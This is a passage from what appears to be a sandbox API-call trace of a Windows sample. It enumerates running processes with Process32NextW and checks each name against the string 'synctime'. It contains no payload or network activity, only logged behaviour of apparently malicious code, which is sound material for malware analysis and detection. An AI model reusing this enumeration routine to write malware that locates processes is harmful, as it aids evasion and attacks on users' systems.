lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.107] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.107] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.107] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.108] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567b90 [0093.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567b90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.108] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.108] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.108] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.109] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567c98 [0093.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3567c98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0093.109] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0093.109] StrStrIA (lpFirst="spoolsv.exe", lpSrch="synctime") returned 0x0 [0093.109] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.110] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567c80 [0093.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567c80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.110] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.110] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.110] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.122] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567ad0 [0093.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3567ad0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0093.122] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0093.122] StrStrIA (lpFirst="audiodg.exe", lpSrch="synctime") returned 0x0 [0093.122] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0093.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.123] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567b30 [0093.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3567b30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0093.123] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0093.123] StrStrIA (lpFirst="sihost.exe", lpSrch="synctime") returned 0x0 [0093.123] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.125] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567a58 [0093.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3567a58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.125] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.125] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.125] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.126] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567aa0 [0093.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3567aa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.126] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.126] StrStrIA (lpFirst="taskhostw.exe", lpSrch="synctime") returned 0x0 [0093.126] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.128] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567b48 [0093.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3567b48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0093.128] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0093.128] StrStrIA (lpFirst="explorer.exe", lpSrch="synctime") returned 0x0 [0093.128] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0093.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.129] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3567050 [0093.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3567050, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0093.129] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0093.129] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="synctime") returned 0x0 [0093.129] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0093.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0093.130] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3566408 [0093.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x3566408, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0093.130] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0093.130] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="synctime") returned 0x0 [0093.130] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0093.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.131] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3567070 [0093.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3567070, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0093.132] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0093.132] StrStrIA (lpFirst="Memory Compression", lpSrch="synctime") returned 0x0 [0093.132] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0093.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.133] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3567130 [0093.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3567130, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0093.133] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0093.133] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="synctime") returned 0x0 [0093.133] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0093.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.135] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567db8 [0093.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3567db8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0093.135] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0093.135] StrStrIA (lpFirst="SearchUI.exe", lpSrch="synctime") returned 0x0 [0093.135] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0093.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.136] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3567250 [0093.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3567250, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0093.136] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0093.136] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="synctime") returned 0x0 [0093.136] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0093.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.137] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567ed8 [0093.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3567ed8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0093.138] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0093.138] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="synctime") returned 0x0 [0093.138] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0093.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.139] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567f08 [0093.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3567f08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0093.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0093.139] StrStrIA (lpFirst="pending.exe", lpSrch="synctime") returned 0x0 [0093.139] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0093.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0093.140] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35664d0 [0093.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x35664d0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0093.141] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0093.141] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="synctime") returned 0x0 [0093.141] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0093.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.142] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3567370 [0093.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3567370, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0093.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0093.142] StrStrIA (lpFirst="swing prefer.exe", lpSrch="synctime") returned 0x0 [0093.142] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0093.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0093.144] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x35667c8 [0093.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x35667c8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0093.144] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0093.144] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="synctime") returned 0x0 [0093.144] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0093.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.146] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3567150 [0093.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3567150, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0093.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0093.146] StrStrIA (lpFirst="nights-attending.exe", lpSrch="synctime") returned 0x0 [0093.146] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0093.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.147] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567f20 [0093.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3567f20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0093.147] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0093.147] StrStrIA (lpFirst="installed.exe", lpSrch="synctime") returned 0x0 [0093.147] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0093.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0093.148] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35664f8 [0093.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x35664f8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0093.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0093.148] StrStrIA (lpFirst="references compounds.exe", lpSrch="synctime") returned 0x0 [0093.149] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0093.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.150] LocalAlloc 